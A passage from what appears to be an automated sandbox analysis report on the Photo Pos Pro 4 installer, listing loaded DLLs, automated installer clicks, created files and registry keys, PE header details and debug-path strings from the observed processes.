                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeAutomated click: I accept the terms of the license agreement
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeAutomated click: Install
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software\AutoUpdator
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software\AutoUpdator\5456531.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software\AutoUpdator\AutoUpdator.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456562.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\FileDlgExtenders.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456578.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\iecore.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456828.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\ielib64.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456875.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\IEvolution2.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456906.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.Compatibility.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456921.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456937.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456953.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457203.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe.config
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457218.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457296.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PosMessageLib.NET.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457312.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PosMessageLib.NET.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PosNetIpLib.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457343.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457343.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.exe.config
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457343.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457359.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PXBIPctl.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457359.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PXBIPctl.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457375.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\ShellBrowser.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457406.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\ShellBrowser.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457437.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\SkinSoft.VisualStyler.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457468.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\SkinSoft.VisualStyler.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457484.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Software License Agreement.rtf
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457546.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.RadDock.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457593.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.RadDock.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457609.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Black.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457625.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Silver.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457656.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.VisualStudio2012Dark.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457687.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.UI.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457796.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.UI.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457859.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457890.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\TelerikCommon.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Pos Pro 4
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: PhotoPosPro4_SetUp.exeStatic file information: File size 60336610 > 1048576
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c6000
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wininet.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1717614800.0000000009AF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: vcredist_x64.exe, 00000017.00000002.2087090753.00000000007AB000.00000002.00000001.01000000.00000010.sdmp, vcredist_x64.exe, 00000017.00000000.2073125075.00000000007AB000.00000002.00000001.01000000.00000010.sdmp, vcredist_x64.exe, 00000018.00000002.2085203247.000000000017B000.00000002.00000001.01000000.00000012.sdmp, vcredist_x64.exe, 00000018.00000000.2074854131.000000000017B000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\XmlCfg.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Documents and Settings\Yoni A\VS2010 Applications\Pos Controls and Libs\PhotoPosPro_PreInstaller\obj\Debug\PhotoPosPro_PreInstaller.pdb source: PhotoPosPro_PreInstaller.exe, 00000019.00000000.2088033481.0000000000FA2000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, MSID82B.tmp, 00000008.00000000.1840081823.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp, MSID82B.tmp, 00000008.00000002.1846400953.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002956000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004465000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004463000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2711123189.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2784580202.0000000005860000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbB source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, MSID82B.tmp, 00000008.00000000.1840081823.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp, MSID82B.tmp, 00000008.00000002.1846400953.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: F:\DotNet\workspace\ShellBrowser.NET Nightly\bin\protect\Release\ShellBrowser.pdb source: Photo Pos Pro 4.exe, 0000001E.00000002.3109776794.00000202D1012000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002956000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004465000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004463000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2711123189.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2784580202.0000000005860000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wininet.pdbUGP source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1717614800.0000000009AF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\dd\vbextras\PowerPacks\objr\i386\Microsoft.VisualBasic.PowerPacks.Vs.pdb source: Photo Pos Pro 4.exe, 0000001E.00000002.3093428256.00000202CE450000.00000002.00000001.01000000.00000021.sdmp
